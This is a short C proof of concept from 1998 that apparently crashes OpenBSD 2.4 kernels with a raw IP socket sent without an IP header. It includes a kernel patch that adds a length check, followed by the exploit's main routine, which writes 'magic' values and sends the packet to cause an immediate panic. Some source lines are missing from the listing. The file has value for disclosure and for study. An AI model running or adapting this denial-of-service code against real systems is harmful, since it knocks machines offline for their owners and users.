2 * $Id: hook.c,v 1.1.1.1 2000/05/25 00:28:49 route Exp $
5 * Panics OpenBSD 2.4 kernels.
7 * Well whut doya know? Here I am working on libnet when I come up with this.
8 * Localhost OpenBSD kernel panic. No security issue. Just a kernel bug.
10 * Opening a raw IP socket and setting IP_HDRINCL and then NOT including an
11 * IP header causes problems. The code below with the `magic` numbers will
12 * cause an immediate kernel panic. Other data may cause kernel
13 * instability leading to an eventual panic or crash.
15 * Needs libnet (http://www.packetfactory.net).
17 * (c) 1998 route|daemon9 <route@infonexus.com>
22 --- raw_ip.c.old Fri Dec 11 16:48:26 1998
23 +++ raw_ip.c Fri Dec 11 16:46:59 1998
25 * don't allow both user specified and setsockopt options,
26 * and don't allow packet length sizes that will crash
28 - if ((ip->ip_hl != (sizeof (*ip) >> 2) && inp->inp_options) ||
29 - ip->ip_len > m->m_pkthdr.len) {
33 + if ((ip->ip_hl != (sizeof (*ip) >> 2) && inp->inp_options)
34 + || (ip->ip_len > m->m_pkthdr.len)
35 + || (ip->ip_len < ip->ip_hl << 2)) {
41 ip->ip_id = htons(ip_id++);
42 /* XXX prevent ip_output from overwriting header fields */
49 main(int argc, char **argv)
54 fprintf(stderr, "PUSH THE PANIC BUTTON!\n");
56 buf = (u_char *)malloc(BUFSIZE);
59 perror("No memory for packet header");
64 * Open a IPPROTO_RAW socket and set IP_HDRINCL.
66 sock = libnet_open_raw_sock(IPPROTO_RAW);
79 *((u_short *)p) = htons(242);
81 *((u_short *)p) = htons(1);
83 libnet_write_ip(sock, buf, BUFSIZE);
84 printf("Didn't die. Try again maybe.\n");
87 return (EXIT_SUCCESS);